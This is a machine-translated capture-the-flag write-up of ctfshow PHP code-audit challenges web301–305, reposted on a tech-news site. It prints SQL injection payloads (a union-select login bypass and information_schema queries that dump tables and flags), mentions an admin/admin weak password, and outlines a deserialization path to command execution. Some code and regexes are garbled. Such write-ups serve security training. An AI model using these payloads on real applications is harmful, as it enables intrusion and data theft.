Shulou(Shulou.com)05/31 Report--

In this issue, the editor will bring you about how to conduct php code audit. The article is rich in content and analyzes and describes for you from a professional point of view. I hope you can get something after reading this article.

Web301

Download address: https://ctfshow.lanzoui.com/ilMPgjfeyxa

I didn't get anything with seay.

Come directly by hand.

Checklogin.php:

It is obvious here that $username is not filtered and sql injection is generated.

Payload:

Userid=1'union select 1#&userpwd=1

Log in successfully and get flag.

Web302

Modification

If (! strcasecmp (sds_decode ($userpwd), $row ['sds_password'])) {

Fun.php:

Try it locally:

Construct payload:

Userid=1'union select "d9c77c4e454869d5d8da3b4be79694d3" # & userpwd=1web303

Download address: https://ctfshow.lanzous.com/i6wtkjg1gxa

Seay audit

There is an injection vulnerability, and the login of the user name limits the length of the user name and cannot be injected.

Dptadd.php:

$sql= "insert into sds_dpt set sds_name='". $dpt_name. ", sds_address ='. $dpt_address.", sds_build_date=' ". $dpt_build_year.", sds_have_safe_card=' ". $dpt_has_cert.", sds_safe_card_num=' ". $dpt_cert_number.", sds_telephone=' ". $dpt_telephone_number."'; "

Dpt.php:

But only if you log in.

The weak password admin/admin login attempt was successful.

After the data is added to dptadd.php, the data is displayed in dpt.php.

Construct paylaod:

Dpt_name=1',sds_address = (select database ()) # # get sdsdpt_name=1',sds_address = (select group_concat (table_name) from information_schema.tables where table_schema=database ()) # # get sds_dpt,sds_fl9g,sds_userdpt_name=1',sds_address = (select group_concat (column_name) from information_schema.columns where table_name= "sds_fl9g") # # get flagdpt_name=1' Sds_address = (select group_concat (flag) from sds_fl9g) # web304

Global waf added

Function sds_waf ($str) {return preg_match ('/ [0-9] | [amurz] |-/ iFei, $str);}

But it can still be injected.

Payload:

Dpt_name=1',sds_address = (select group_concat (flag) from sds_flaag) # web305

Too much waf:

Function sds_waf ($str) {if (preg_match ('/\ ~ |\ `|\! |\ @ |\ # |\ $|\% |\ ^ |\ & |\ * |\ (\) |\ _ |\ = |\ {|\} |\ [|\] |\; |\'|\ |\,\. |\? |\ / |\ |\ /', $str)) {return false } else {return true;}}

But there is an extra hole in the deserialization write file.

Class.php

It happens to include dao.php, and there is deserialization unserialize.

Exp:

But dao.php is not directly included here.

Let's take a look at service.php and find that it contains dao.php, and the service class also has calling functions.

Public function clearCache () {$this- > dao- > clearCache ();}

So obviously, the vulnerability here that uses logout.php to deserialize arbitrary execution commands can:

Call the dao class through service.php to call its function

Call dao.php directly to call its function

Because here $this- > config- > cache_dir also needs to use cache.dir, which is a variable in config.php

Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.